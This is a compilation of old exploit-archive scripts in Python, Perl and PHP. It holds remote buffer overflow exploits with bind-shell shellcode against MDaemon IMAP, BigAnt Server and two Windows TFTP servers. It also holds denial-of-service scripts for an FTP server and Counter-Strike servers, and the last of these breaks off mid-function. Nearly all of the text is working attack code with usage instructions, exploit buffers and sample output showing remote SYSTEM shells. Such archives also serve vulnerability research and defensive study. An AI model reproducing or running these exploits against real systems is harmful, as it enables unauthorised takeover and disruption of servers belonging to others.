#-----------------------------------------------------------------------------
##############################################################################
# [+] Connecting to imap server...
# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
#
# [+] Logging in...
# 0001 OK LOGIN completed
#
# [+] Selecting Inbox Folder...
# * FLAGS (\Seen \Answered \Flagged \Deleted \Draft \Recent)
# * 16 EXISTS
# * 16 RECENT
# * OK [UNSEEN 1] first unseen
# * OK [UIDVALIDITY 1205411202] UIDs valid
# * OK [UIDNEXT 17] Predicted next UID
# * OK [PERMANENTFLAGS (\Seen \Answered \Flagged \Deleted \Draft)] .
# 0002 OK [READ-WRITE] SELECT completed
#
# [+] We need at least one message in Inbox, appending one...
# + Ready for append literal
#
# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
# * 17 EXISTS
# * 17 RECENT
# 0003 OK [APPENDUID 1205411202 17] APPEND completed
#
# [+] DINNER'S READY: Sending Evil Buffer...
# [+] DONE! Check your shell on 192.168.1.195:4444
#
#
# matte@badrobot:~$ nc 192.168.1.195 4444
# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
# matte@badrobot:~$ nc 192.168.1.195 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>whoami
# whoami
# NT AUTHORITY\SYSTEM
#
# C:\MDaemon\APP>
##############################################################################
from socket import *
from optparse import OptionParser
import sys, time
print "[*********************************************************************]"
print "[* *]"
print "[* MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT *]"
print "[* DISCOVERED AND CODED *]"
print "[* by *]"
print "[* MATTEO MEMELLI *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-l", "--login-user", type="string",
action="store", dest="USER",
help="User login")
parser.add_option("-p", "--login-password", type="string",
action="store", dest="PASSWD",
help="User password")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
USER = options.USER
PASSWD = options.PASSWD
if not (HOST and PORT and USER and PASSWD):
parser.print_help()
sys.exit()
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
"\xff\xd0"
)
s = socket(AF_INET, SOCK_STREAM)
print " [+] Connecting to imap server..."
s.connect((HOST, PORT))
print s.recv(1024)
print " [+] Logging in..."
s.send("0001 LOGIN %s %s\r\n" % (USER, PASSWD))
print s.recv(1024)
print " [+] Selecting Inbox Folder..."
s.send("0002 SELECT Inbox\r\n")
print s.recv(1024)
print " [+] We need at least one message in Inbox, appending one..."
s.send('0003 APPEND Inbox {1}\r\n')
print s.recv(1024)
print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?"
s.send('SPAGHETTI AND PWNSAUCE\r\n')
print s.recv(1024)
print " [+] DINNER'S READY: Sending Evil Buffer..."
# Seh overwrite at 532 Bytes
# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
EVIL = "A"*528 + "\xEB\x06\x90\x90" + "\x8b\x11\xdc\x64" + "\x90"*8 + shellcode + 'C'*35
s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])\r\n")
s.close()
print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
# milw0rm.com [2008-03-13]
Matteo Memelli/BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day) ( windows)
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#
###############################################################################
from socket import *
from optparse import OptionParser
import sys
print "[*********************************************************************]"
print "[* *]"
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
print "[* Discovered and Coded By *]"
print "[* Matteo Memelli *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
parser.print_help()
sys.exit()
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
shellcode = (
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
'C'*1225
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
# s.connect(('192.168.1.195', 6080))
s.connect((HOST, PORT))
print '[+] Overflowing the buffer...'
s.send('GET ' + evilbuf + "\n\n")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
# milw0rm.com [2008-04-15]
muts/TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day) ( windows)
#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation. All
# rights reserved.
#
# C:\Windows\system32>
##################################################################
import socket
import sys
print "[*] TFTP Server for Windows V1.4 ST (0day)"
print "[*] http://www.offensive-security.com"
host = '172.16.167.134'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
# Jump back shellcode
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6"
"\xff\xd0")
filename = "\x90"*860 + shell + "\x90"*14 + sc + "\xeb\xd0\x90\x90" + "\x2b\x0e\x41"
mode = "netascii"
muha = "\x00\x02" + filename+ "\0" + mode+ "\0"
print "[*] Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"
# milw0rm.com [2008-03-26]
SkD/ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BOF Exploit ( windows)
#!/usr/bin/perl
#
# ProSysInfo TFTP server TFTPDWIN <= 0.4.2
# Universal Remote Buffer Overflow Exploit
# [Works on all Windows versions.]
# ----------------------------------------
# Exploit by SkD (skdrat@hotmail.com)
#
# Let's take a description from their page at:
# http://www.tftpserver.prosysinfo.com.pl
#
# "The TFTP Server TFTPDWIN software is a
# multithreaded TFTP protocol server for
# Windows 98/Me/2000/XP/2003. TFTP Server
# TFTPDWIN is compatible with RFC 1350,
# RFC 2347, RFC 2348, and RFC 2349, documents."
#
# Some of their clients include: CISCO, Alcatel-Lucent,
# Intel, AT&T, Panasonic, Boeing ...
#
# Wow, all of these companies use this software!
# This is pretty much serious.
#
# So this is my new exploit and I made it universal like
# the last one. This overflow was pretty much weird at
# first sight, but a bit of looking into the software
# can tell you many things about it!
#
# If Immunity (www.immunityinc.com) can make a commerical
# exploit for this and keep it for private clients,
# so can I ;) but to the public :). Have fun ladies &
# gents.
#
# Usage: prosystftpd_exploit.pl <target IP>
#
# Greets fly to InTeL.
#
# WARNING: Author has no responsibility over the damage
# you do using this!
use IO::Socket;
use warnings;
use strict;
if(!($ARGV[0]))
{
print "[x] ProSysInfo TFTP server TFTPDWIN <= 0.4.2\n";
print " Universal Remote Buffer Overflow Exploit\n\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
print "[x] Usage: prosystftpd_exploit.pl <target IP>\n\n";
exit(0);
}
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
my $shellcode =
"\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xaf".
"\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\xaf\x4f\x32\xa9".
"\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\x8f\x4e\x52\xa5".
"\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\xa8\x8e\x73\xe1".
"\xae\x8d\x52\x18\x94\x1b\x9d\xe8\xda\xaa\x32\xb3\x8b\x4e\x52\x8a".
"\x24\x43\xf2\x67\xf0\x53\xb8\x07\x24\x53\x32\xed\x44\xc6\xe5\xc8".
"\xab\x8c\x88\x2c\xcb\xc4\xf9\xdc\x2a\x8f\xc1\xe0\x24\x0f\xb5\x67".
"\xdf\x53\x14\x67\xc7\x47\x52\xe5\x24\xcf\x09\xec\xaf\x4f\x32\x84".
"\x93\x10\x88\x1a\xcf\x19\x30\x14\x2c\x8f\xc2\xbc\xc7\xbf\x33\xe8".
"\xf0\x27\x21\x12\x25\x41\xee\x13\x48\x2c\xd8\x80\xcc\x4f\xb9\xec";
my $p1="\x00\x01";
my $p2="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";
my $ret = "\x5d\x10\x40"; #0040105D -> :) SkD's Tricks
my $nopsled = "\x90" x 10;
my $len = (274 - length($shellcode));
if($len < 0) {
print "[x] Your shellcode is too big! Find another way :)\n";
exit(0);
}
my $overflow = "\x41" x $len;
my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret).($p2));
my $sock = new IO::Socket::INET(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>'69');
die "[x] Cannot Connect!\n" unless $sock;
print "[x] Connected to daemon :)\n";
print "[x] Sending packet..\n";
print $sock $packet;
sleep(1);
close $sock;
print "[x] Target owned!\n";
exit(0);
# milw0rm.com [2008-12-14]
Houssam Sahli/XM Easy Personal FTP Server 5.8.0 (TYPE) Denial Of Service ( windows)
#!/usr/bin/python
#
# Exploit Title : XM Easy Personal FTP Server 5.8.0 Denial Of Service LIST command
# Date: 10/02/2011
# Author: Houssam Sahli
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP SP3 French
#!/usr/bin/python
print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft"
print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj"
print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U"
print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f"
print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft"
print "ULJcJcJLYLL7L7L71 backtronux@gmail.com 1h1f2f2fFt1fF1Ft"
print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12"
print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU"
print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft"
print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU"
print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f"
print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft"
print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12"
print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU"
print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. .ri7LfE9 ihh2Ffhfhf2"
print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf"
print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2"
print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J"
print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11"
print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf"
print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1"
print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf"
print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12"
print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU"
print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22"
print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2"
print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F"
print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf"
print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21"
print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf"
print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1"
print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n"
print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call TYPE command.\n"
import socket
import sys
def Usage():
print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 6300
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send malicious string"
sock.send("TYPE %s\r\n" %buffer)
sock.close()
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)
Eugene Minaev/Half-Life CSTRIKE Server 1.6 Denial of Service Exploit (no-steam) ( multiple)
----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ]
Counter Strike 1.6 Denial Of Service POC
Eugene Minaev underwater@itdefence.ru
Bug was found by Maxim Suhanov ( THE FUF )
works only with no-steam servers
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
<html>
<head>
<title>Counter Strike DOS POC (underwater@itdefence.ru) </title>
<style type="text/css">
input {
width: 150px;
}
td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}
span.err {
color: red;
}
span.ok {
color: green;
}
</style>
</head>
<body onload="checkpass()">
<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">
<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>
<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>
<tr>
<td> </td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>
<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>
<tr>
<td> </td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>
</table>
<br/>
</form>
</div>
<center>ITDEFENCE / RUSSIA (http://itdefence.ru)<br>
</body>
</html>
<?php
/*
CS-dos exploit made by underwater
Bug was discovered by .FUF
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server [IMG]http://www.softoplanet.ru/style_emoticons/default/biggrin.gif[/IMG] ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
*/
ini_set("display_errors","0");
function HELLO_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "TSource Engine Query";
$packet .= pack("H*","00");
return $packet;
}
function CHALLENGE_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "getchallenge valve";
$packet .= pack("H*","00");
return $packet;
}
function LOGIN_PACKET_4()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","220A0000EE02");
return $packet;
}
function LOGIN_PACKET_2()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","22");
return $packet;
}
function dowork($host,$port,$password,$auth)
{
global $password;
global $cookie;
# connecting to target host
$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
if (!$fsock) die ($errstr);
else
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp = fread($fsock,100);
# grab cookies from packet
$cookie = substr($resp,strpos($resp,"A00000000")+10);
$cookie = substr($cookie,0,strpos($cookie," "));
# sending login packet
